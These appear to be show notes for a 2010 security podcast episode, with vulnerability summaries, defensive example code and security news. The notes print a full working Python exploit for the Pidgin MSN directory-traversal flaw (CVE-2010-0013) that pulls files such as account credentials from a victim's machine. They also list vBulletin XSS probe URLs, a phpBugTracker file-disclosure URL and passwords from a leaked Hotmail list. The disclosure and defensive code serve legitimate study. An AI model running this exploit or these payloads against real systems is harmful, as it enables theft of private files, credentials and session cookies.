ISD Podcast Episode 72 for February 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191
Data Recovery Class April 12th to the 16th in Washington DC. Go to MyHardDriveDied.com or email smoulton at nicservices dot com for more information.
The next dc404 meeting will be at Outerzone near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)
April 15 – 21, 2010 SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)
May 17 – 21, 2010 SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth (http://www.sans.org/atlanta-critical-controls-2010-cs)
Vulnerabilities of Interest:
- Libpurple is subject to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. Versions prior to Libpurple 2.6.5 are vulnerable.
#!/usr/bin/env python
"""
Pidgin MSN <= 2.6.4 file download vulnerability
Mathieu GASPARD (gaspmat@gmail.com)

Description:
Pidgin is a multi-protocol Instant Messenger. This is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi.
The issue is caused by an error in the MSN custom smiley feature when processing emoticon requests,
which could allow attackers to disclose the contents of arbitrary files via directory traversal attacks.

Affected versions :
Pidgin <= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library.
Plugin msn-pecan 0.1.0-rc2 (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date

Platforms :
Windows, Linux, Mac

Fix :
Fixed in Pidgin 2.6.5
Update to the latest version : http://www.pidgin.im/download/

References :
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013
[2] http://www.pidgin.im/news/security/?id=42

Usage :
You need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn
python pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l]

Example :
# python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml]
***********************************************************
Pidgin MSN file download vulnerability (CVE-2010-0013)
Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]
***********************************************************
Please enter the password for the account "foo@hotmail.com"
Password:
[+] Connecting to server
[+] Authentication in progress
[+] Synchronisation in progress
[+] OK, all done, ready to proceed
[+] Sending request for file "../accounts.xml" to "victim@hotmail.com"
[+] Using session_id 974948028
Current : 3606, total: 3881 (92%)
[+] Got an answer from the contact
----------------
<?xml version='1.0' encoding='UTF-8' ?><account version='1.0'>
........
"""

import warnings
warnings.simplefilter("ignore", DeprecationWarning)
import os
import sys
try:
    import pymsn
except ImportError:
    print "Pymsn couldn't be loaded"
    print "On debian-like systems, the package is python-msn"
    sys.exit(-1)
import gobject
import logging
import getpass
import hashlib
from optparse import OptionParser
import signal
import time

SERVER_ADDRESS = 'messenger.hotmail.com'
SERVER_PORT = 1863
FD_OUT = sys.stdout
MAINLOOP = None
# seconds after which, if we didn't get an answer, we quit
TIMEOUT = 5

global_client = None


def quit():
    MAINLOOP.quit()
    sys.exit(0)


def check_if_succeeds():
    # if False, we didn't get a chunk so we won't get any file, so we quit
    if global_client.GOT_CONTROL_BLOB == False:
        print "[+] Didn't get an answer from the client after %d seconds, it's likely not vulnerable or the file requested doesn't exist/is not accessible" % TIMEOUT
        print "[+] Exiting"
        global_client.quit()


# called when we get the result data, after our request
def handle_answer(object, client):
    print "\n[+] Got an answer from the contact"
    d = object._data
    data = d.read()
    length = len(data)
    FD_OUT.write(data)
    # if we wrote output to stdout, don't close it
    if FD_OUT != sys.stdout:
        FD_OUT.close()
        print "[+] Wrote %d bytes to file" % length
    client.end = time.time()
    duration = client.end - client.begin
    print "[+] Download lasted %d seconds at %d bytes/s " % (duration, (length / duration))
    client.quit()


def my_on_chunk_recv(transport, chunk):
    global_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk)
    session_id = chunk.header.session_id
    blob_id = chunk.header.blob_id
    if session_id == global_client.session_id:
        # first blob is control, we "squeeze" it and keep only the second one
        if global_client.GOT_CONTROL_BLOB == False:
            #print "Got Control blob in our connection (session_id : %d, blob_id: %d)" % (session_id, blob_id)
            global_client.GOT_CONTROL_BLOB = True
        else:
            # if the connection is complete, session_id is removed from data_blobs so we have to check before accessing it
            if global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id):
                current_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id]
                print "Current : %d, total: %d (%d%%)\r" % (current_blob.current_size, current_blob.total_size, ((current_blob.current_size * 100) / current_blob.total_size)),
                sys.stdout.flush()


def error_handler(self, error_type, error):
    # __on_user_invitation_failed, probably because contact is offline/invisible
    if error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \
       error == pymsn.event.ContactInviteError.NOT_AVAILABLE:
        print "[*] ERROR, contact didn't accept our invite, probably because it is disconnected/invisible"
        quit()
    # __on_message_undelivered, probably because contact is offline/invisible
    if error_type == pymsn.event.ConversationErrorType.MESSAGE and \
       error == pymsn.event.MessageError.DELIVERY_FAILED:
        print "[*] ERROR, couldn't send message, probably because contact is disconnected/invisible"
        quit()
    print "[*] Unhandled error, error_type : %d , error : %d" % (error_type, error)
    quit()


class MyClient(pymsn.Client):
    def __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection):
        # callback to quit
        self.quit = quit
        # victim from whom we request the file
        self.victim = victim
        # just list contacts for this account
        self.list_only = list_only
        # file we request
        self.filename = filename
        # to calculate download duration and speed
        self.begin = 0
        self.end = 0
        # session_id of the connection to retrieve the file
        self.session_id = 0
        # have we already seen the "control blob" for this connection
        self.GOT_CONTROL_BLOB = False
        pymsn.Client.__init__(self, server)
        # REALLY REALLY HACKISH
        # if contact is disconnected/invisible, a "NotImplementedError" exception is raised
        # and it can't be caught AFAIK so it needs to be redefined here
        # handler_class should be SwitchboardClient
        for handler_class, extra_args in self._switchboard_manager._handlers_class:
            handler_class._on_error = error_handler


class MyMSNObjectStore(pymsn.p2p.MSNObjectStore):
    def __compute_data_hash(self, data):
        digest = hashlib.sha1()
        data.seek(0, 0)
        read_data = data.read(1024)
        while len(read_data) > 0:
            digest.update(read_data)
            read_data = data.read(1024)
        data.seek(0, 0)
        return digest.digest()

    # need to compute the SHA hash (SHAd in MSNObject), otherwise the function in MSNObjectStore complains because
    # the hash of the data we receive is not the hash we expected (the hash we expect is the one we send, which is always the same here)
    def _outgoing_session_transfer_completed(self, session, data):
        handle_id, callback, errback, msn_object = self._outgoing_sessions[session]
        msn_object._data_sha = self.__compute_data_hash(data)
        super(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data)


class ClientEventHandler(pymsn.event.ClientEventInterface):
    def on_client_error(self, error_type, error):
        if error_type == pymsn.event.ClientErrorType.AUTHENTICATION:
            print "[+] Authentication failed, bad login/password"
            self._client.quit()
        else:
            print "[*] ERROR :", error_type, " ->", error

    def on_client_state_changed(self, state):
        #print "State changed to %s" % state
        if state == pymsn.client.ClientState.CLOSED:
            print "[+] Connection to server closed"
            self._client.quit()
        if state == pymsn.client.ClientState.CONNECTING:
            if self.current_state != state:
                print "[+] Connecting to server"
                self.current_state = state
        if state == pymsn.client.ClientState.AUTHENTICATING:
            if self.current_state != state:
                print "[+] Authentication in progress"
                self.current_state = state
        if state == pymsn.client.ClientState.SYNCHRONIZING:
            if self.current_state != state:
                print "[+] Synchronisation in progress"
                self.current_state = state
        if state == pymsn.client.ClientState.OPEN:
            print "[+] OK, all done, ready to proceed"
            self._client.profile.presence = pymsn.Presence.INVISIBLE
            contact_dict = {}
            for i in self._client.address_book.contacts:
                contact_dict[i.account] = i
            if self._client.list_only:
                for (k, v) in contact_dict.items():
                    print k + " (" + v.display_name + ")"
                self._client.quit()
            else:
                if self._client.victim not in contact_dict.keys():
                    print "[*] Error, contact %s not in your contact list" % self._client.victim
                    self._client.quit()
                else:
                    contact = contact_dict[self._client.victim]
                    store = MyMSNObjectStore(self._client)
                    object = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, 'AAA=', '2jmj7l5rSw0yVb/vlWAYkK/YBwk=')
                    print "[+] Sending request for file \"%s\" to \"%s\"" % (self._client.filename, self._client.victim)
                    self._client.begin = time.time()
                    store.request(object, [handle_answer, self._client])
                    # at this moment, we got only one session_id, the one we will use to request the file
                    for k in store._outgoing_sessions.keys():
                        print "[+] Using session_id %d" % k._id
                        self._client.session_id = k._id
                    # hack to set up my own callback each time we receive a chunk, used to print the percentage of the download
                    self._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received
                    self._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv
                    # if no file transfer received from the victim after TIMEOUT seconds, quit
                    gobject.timeout_add(TIMEOUT * 1000, check_if_succeeds)

    def __init__(self, client):
        self.current_state = None
        pymsn.event.ClientEventInterface.__init__(self, client)


if __name__ == '__main__':
    print "***********************************************************\n"
    print "Pidgin MSN file download vulnerability (CVE-2010-0013)\n"
    print "Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\n"
    print "***********************************************************\n"

    usage = "Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] "
    parser = OptionParser(usage=usage)
    parser.add_option("-f", "--file", dest="filename", default=None,
                      help="File requested to remote contact")
    parser.add_option("-o", "--output", dest="output_file", default=None,
                      help="Where to write received file, STDOUT otherwise")
    parser.add_option("-a", "--account", dest="account", default=None,
                      help="MSN account to use")
    parser.add_option("-c", "--contact", dest="contact", default=None,
                      help="Contact to request file from")
    parser.add_option("-l", "--list", dest="list_only", action="store_true", default=False,
                      help="Just print contact list for your account and exit")
    (options, args) = parser.parse_args()
    if not options.filename or not options.account or not options.contact:
        if not (options.account and options.list_only):
            print "Error, parameter missing"
            parser.print_help()
            sys.exit(-1)

    if options.output_file != None:
        try:
            FD_OUT = open(options.output_file, "wb")
        except Exception, e:
            print "Cannot open file %s (%s)" % (options.output_file, e)
            sys.exit(-1)

    MAINLOOP = gobject.MainLoop()

    # signal handlers receive (signum, frame); quit from the main loop, not from the handler
    def sigterm_cb(signum, frame):
        gobject.idle_add(quit)
    signal.signal(signal.SIGTERM, sigterm_cb)
    logging.basicConfig(level=logging.CRITICAL)  # lower the level to see the protocol debug
    server = (SERVER_ADDRESS, SERVER_PORT)
    client = MyClient(server, quit, options.contact, options.filename, options.list_only)
    global_client = client
    client_events_handler = ClientEventHandler(client)
    print "Please enter the password for the account \"%s\"" % options.account
    try:
        passwd = getpass.getpass()
    except KeyboardInterrupt:
        quit()
    login_info = (options.account, passwd)
    client.login(*login_info)
    try:
        MAINLOOP.run()
    except KeyboardInterrupt:
        quit()

- vBulletin is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues affect vBulletin 4.0.2; other versions may also be affected. Example URLs:
http://www.sample.com/upload/calendar.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/faq.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/forum.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/usercp.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/subscription.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/showthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/showgroups.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/sendmessage.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/search.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/register.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/profile.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/private.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/online.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/newthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/misc.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/memberlist.php?=>”‘><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/member.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/inlinemod.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/index.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://www.sample.com/upload/forumdisplay.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
- phpBugTracker is subject to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view local files in the context of the webserver process, which may aid in further attacks. This issue affects phpBugTracker 1.0.1; other versions may be vulnerable as well. Example URL: http://www.sample.com/[path]/attachment.php?filename=./config.php
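The libpurple and phpBugTracker items above are the same bug class: a file name chosen by the remote party (an MSN custom-emoticon name, an attachment filename) is joined onto a directory and read without checking where the result lands. Added example, not code from the podcast or from either project: the unchecked join beside a resolver that canonicalizes the path and confirms it stays under the served directory, run against a constructed temporary layout whose directory and file names are assumptions.

```python
import os
import tempfile


class PathTraversalError(ValueError):
    """Raised when a requested name would escape the served directory."""


def naive_resolve(served_dir, requested):
    """The unchecked pattern behind both advisories: join and trust the result."""
    return os.path.normpath(os.path.join(served_dir, requested))


def safe_resolve(served_dir, requested):
    """Resolve `requested` inside `served_dir` or raise PathTraversalError.

    realpath collapses '..' segments and follows symlinks, so containment is
    tested on the canonical path rather than on the text of the request;
    commonpath avoids the 'base' vs 'base2' prefix pitfall of a bare
    startswith() check.
    """
    if not requested or "\x00" in requested:
        raise PathTraversalError("empty name or embedded NUL")
    if os.path.isabs(requested) or requested[:1] in ("/", "\\") or requested[1:2] == ":":
        raise PathTraversalError("absolute path not allowed: %r" % (requested,))
    base = os.path.realpath(served_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise PathTraversalError("%r escapes %s" % (requested, base))
    if not os.path.isfile(candidate):
        raise PathTraversalError("%r is not a regular file under %s" % (requested, base))
    return candidate


def classify(served_dir, requested):
    """'ok' if the hardened resolver would serve the name, 'blocked' otherwise."""
    try:
        safe_resolve(served_dir, requested)
        return "ok"
    except PathTraversalError:
        return "blocked"


def build_fixture():
    """Constructed layout (assumed, for the demo): <root>/smileys/ is the
    directory the application may serve from, <root>/accounts.xml the secret
    one level above it, and smileys/link.png a symlink pointing at the secret."""
    root = tempfile.mkdtemp(prefix="traversal-demo-")
    served = os.path.join(root, "smileys")
    os.mkdir(served)
    with open(os.path.join(served, "smile.png"), "wb") as f:
        f.write(b"\x89PNG constructed")
    with open(os.path.join(root, "accounts.xml"), "w") as f:
        f.write("<account><password>constructed secret</password></account>")
    try:
        os.symlink(os.path.join(root, "accounts.xml"), os.path.join(served, "link.png"))
    except (OSError, NotImplementedError):
        pass  # platform without symlink support; the symlink case is then skipped
    return root, served


if __name__ == "__main__":
    root, served = build_fixture()
    for name in ("smile.png", "../accounts.xml", "link.png", os.path.join(root, "accounts.xml")):
        print("%-40s naive -> %s | hardened -> %s"
              % (name, naive_resolve(served, name), classify(served, name)))
```

The symlink case is the one a text-only filter (rejecting "..") still misses; resolving first and comparing canonical paths catches it.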
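Added example (not from the podcast or from vBulletin): detection logic for probes shaped like the vBulletin URLs above, run over constructed access-log lines. It URL-decodes the request, separates the query string from the PATH_INFO tail that follows the .php script name (the two places those URLs inject into) and flags script markers case-insensitively; the log lines, addresses and timestamps are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Markers that have no business in a forum request. The probes above use
# <ScRiPt>, so matching is case-insensitive and is done after URL-decoding,
# because scanners routinely percent-encode the payload.
XSS_MARKERS = re.compile(r"(<\s*/?\s*script\b|javascript\s*:|\bon\w+\s*=)", re.IGNORECASE)

# Apache combined-format line (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample: two probes shaped like the example URLs (query-parameter
# and PATH_INFO variants, the second one percent-encoded) and two benign hits.
SAMPLE_LOG = '''
203.0.113.5 - - [22/Feb/2010:10:01:02 +0000] "GET /upload/calendar.php?acuparam=>%22><ScRiPt>alert(213771818860)</ScRiPt> HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Feb/2010:10:01:03 +0000] "GET /upload/usercp.php/%3E%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Feb/2010:10:02:00 +0000] "GET /upload/showthread.php?t=1234&page=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Feb/2010:10:02:05 +0000] "GET /upload/search.php?do=process&query=script%20tags HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
'''


def split_target(target):
    """Return (script, path_info, query), each URL-decoded once.

    vBulletin scripts end in .php; anything after that in the path is
    PATH_INFO, which the /usercp.php/>"><ScRiPt> style probes inject into.
    Decode a second time if a front-end proxy double-decodes.
    """
    parts = urlsplit(target)
    path = unquote_plus(parts.path)
    head, sep, tail = path.partition(".php")
    script = head.rsplit("/", 1)[-1] + ".php" if sep else path.rsplit("/", 1)[-1]
    return script, (tail if sep else ""), unquote_plus(parts.query)


def find_xss_probes(log_text):
    """Scan log lines and return one record per request carrying an XSS marker."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these
        rec = m.groupdict()
        script, path_info, query = split_target(rec["target"])
        for where, value in (("path_info", path_info), ("query", query)):
            hit = XSS_MARKERS.search(value)
            if hit:
                hits.append({"ip": rec["ip"], "ts": rec["ts"], "script": script,
                             "where": where, "marker": hit.group(0), "status": rec["status"]})
                break  # one alert per request is enough
    return hits


if __name__ == "__main__":
    for h in find_xss_probes(SAMPLE_LOG):
        print("%(ts)s %(ip)s %(script)s [%(where)s] matched %(marker)r -> HTTP %(status)s" % h)
```

A 200 status on a flagged request is the interesting signal: the payload was reflected by a script that served it instead of rejecting it.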
News Items of Interest:
News item 1: http://www.allaboutjazz.com/php/news.php?id=50220
A band of hackers who were recently discovered hoarding a trove of account logons pilfered from thousands of companies worldwide are garden-variety cyberthieves. The gang most likely began by hiring spam specialists to send out e-mail and social-networking posts to lure recipients into clicking on a tainted Web link. They then used a dated free version of a hacking tool called ZeuS and did nothing to hide their tracks, indicating that “they’re probably amateurs.”
This underscores how deeply cybercriminals — from novices to elite gangs — have now saturated the Internet with infections that allow them to take full control of Windows PCs. Cybergangs slot newly infected PCs, called bots, into networks called botnets. On any given day, 12% to 15% of the 1.6 billion computers connected to the Internet are bots, according to security firm Damballa.
News item 2: http://www.suntimes.com/entertainment/music/2059068,freeallmusic-guvera-music-sites-022010.article
Two new companies are giving consumers a way to download songs for free by watching a few ads. The idea has been tried before but this time it appears it might work, because the startups have found advertisers that are willing to pay around $2 to have a moment of your time.
That means recording companies can get about as much compensation from the free services as they receive from a download on iTunes that costs the consumer $1.29.
“You pay for the song by paying attention to the advertiser,” said Richard Nailling, CEO of FreeAllMusic.com, which launched an invitation-only test of its service in December. “It’s a fair trade of attention for music.”
Both Free All Music and another new free site, Guvera.com, have licensing deals with independent labels and two of the largest recording companies, Universal Music Group and EMI Group PLC. Fans of U2, Black Eyed Peas and Norah Jones should be happy. But admirers of Ke$ha or Sade, both with Sony Music labels, will be out of luck for now.
The new services come after years of falling CD sales. More people are consuming music online but spending far less for it.
In response, recording companies have been licensing songs to an array of Internet businesses that offer songs cheaply or for free — in the hope that these legitimate alternatives can keep people from turning to illegal downloads.
News item 3: http://www.acunetix.com/blog/websecuritynews/statistics-from-10000-leaked-hotmail-passwords/
An anonymous user posted usernames and passwords of over 10,000 Windows Live Hotmail accounts to a web site called PasteBin. PasteBin is currently down for maintenance but I managed to get a copy of the list, and quickly generated some statistics from these passwords.
Below are the statistics:
- The list initially contained 10,028 entries.
- After I’ve cleaned up the list, like removing entries without a password, I had 9843 valid entries (passwords).
- There are 8931 (90%) unique passwords in the list.
- The longest password was 30 chars long: lafaroleratropezoooooooooooooo.
- The shortest password was 1 char long : )
Top 20 most common passwords:
- 123456 – 64
- 123456789 – 18
- alejandra – 11
- 111111 – 10
- alberto – 9
- tequiero – 9
- alejandro – 9
- 12345678 – 9
- 1234567 – 8
- estrella – 7
- iloveyou – 7
- daniel – 7
- 000000 – 7
- roberto – 7
- 654321 – 6
- bonita – 6
- sebastian – 6
- beatriz – 6
- mariposa – 5
- america – 5
Based on these passwords I think the phishing kit was targeted towards the Latino community.
Password length distribution:
- 1 chars – 2 – 0 %
- 2 chars – 4 – 0 %
- 3 chars – 4 – 0 %
- 4 chars – 31 – 0 %
- 5 chars – 49 – 1 %
- 6 chars – 1946 – 22 %
- 7 chars – 1254 – 14 %
- 8 chars – 1838 – 21 %
- 9 chars – 1091 – 12 %
- 10 chars – 772 – 9 %
- 11 chars – 527 – 6 %
- 12 chars – 431 – 5 %
- 13 chars – 290 – 3 %
- 14 chars – 219 – 2 %
- 15 chars – 157 – 2 %
- 16 chars – 190 – 2 %
- 17 chars – 56 – 1 %
- 18 chars – 17 – 0 %
- 19 chars – 7 – 0 %
- 20 chars – 14 – 0 %
- 21 chars – 10 – 0 %
- 22 chars – 8 – 0 %
- 23 chars – 3 – 0 %
- 24 chars – 3 – 0 %
- 25 chars – 3 – 0 %
- 26 chars – 0 – 0 %
- 27 chars – 3 – 0 %
- 28 chars – 0 – 0 %
- 29 chars – 1 – 0 %
- 30 chars – 1 – 0 %
As you can see from the list above, most of the passwords are between 6 and 9 characters long. Average password length is 8 characters.
What kind of passwords were in the list?
- 3,713 = 42 %; lower alpha passwords: passwords containing only characters from ‘a’ to ‘z’. Example: iloveyou
- 291 = 3 %; mixed case alpha passwords: passwords containing characters from ‘a’ to ‘z’ and from ‘A’ to ‘Z’. Example: ILoveYou
- 1707 = 19 %; numeric passwords: passwords containing only numbers (‘0’ to ‘9’). Example: 123456
- 2655 = 30 %; mixed alpha and numeric passwords: passwords containing characters from ‘a’-‘z’, ‘A’-‘Z’ and ‘0’-‘9’. Example: Iloveyou12
- 565 = 6 %; mixed alpha + numeric + other characters. Example: 1Love You$%@
News item 4: http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=223000208
Emerging botnet could redirect users to data-stealing sites, researchers say. Czech security experts say they have uncovered a global botnet that may be redirecting Web surfers to other sites for the purpose of stealing their data.
Jan Vykopal, head of the security project of Masaryk University, told the Czech news agency CTK earlier this week that the Czech Defense Ministry discovered the botnet during a project called CYBER, in which several agencies have been researching ways to improve the country’s cyber defenses.
The botnet’s creators have dubbed the network “Chuck Norris” after the famous Hollywood actor and martial arts expert.
Researchers told the CTK that the botnet could allow operators to breach sensitive user data, such as access details for bank accounts, email boxes, passwords to various services, social networks, and other personal data.
The botnet could conceivably be used for attacks on well-secured servers, as well, Vykopal said, but the researchers are uncertain of how many devices it has martialed.
News item 5: http://www.eweek.com/c/a/Security/FBI-Investigates-Webcam-Spy-Allegations-Against-School-451724/
The FBI is investigating allegations made against the Lower Merion School District in a lawsuit by the parents of a student. The lawsuit claims school officials used a remote-controlled Webcam to spy on their son, a high school student.
The FBI is reportedly investigating a Pennsylvania school district for possible federal law violations in light of a lawsuit filed by the parents of a high school student.
News item 6: http://www.youtube.com/watch?v=QoqRR_J9ORc%20rel=
I have a lot of interest in the naughtiness of the web and even if it just so happens that an attractive young woman going by the unusual name of “Numbers Anacker” (user id Man17782) that has never posted a single item to my site, I might be likely to follow her. As would more and more folks (some of whom are following her back – presumably because they are intrigued by her photograph). As the following YouTube video demonstrates, this appears to be an attempt to get people to sign up for a website that offers to find adults new sexual partners.
News item 7: http://www.shadyurl.com/
Link shortening has become commonplace on services like Facebook and Twitter. Heck, even Google shortens URLs within its products now. People seem to be getting more used to the idea that shortened URLs, despite not showing you where they lead, are safe. Part of that is that the companies doing the shortening keep blacklists of sites with malware or spyware, to keep people from accidentally visiting sites that will do harm.
Newcomer ShadyURL makes no such claims though. This wonderfully satirical service turns even legitimate URLs into something that even the least tech-savvy friend or family member would know better than to click on. It inserts anything from what appear to be hijacking commands, to profanity and the names of well-known malware. In other words, whomever you send one of these links to is likely to say “there’s no way I’m clicking on that,” even though it’s likely to lead to a safe site.
Here are some of the gems it spat out for some common sites:
Facebook.com became: http://5z8.info/inject_worm_w0x6_open.exe
Twitter.com became: http://5z8.info/hack-outlook_z6t4_warez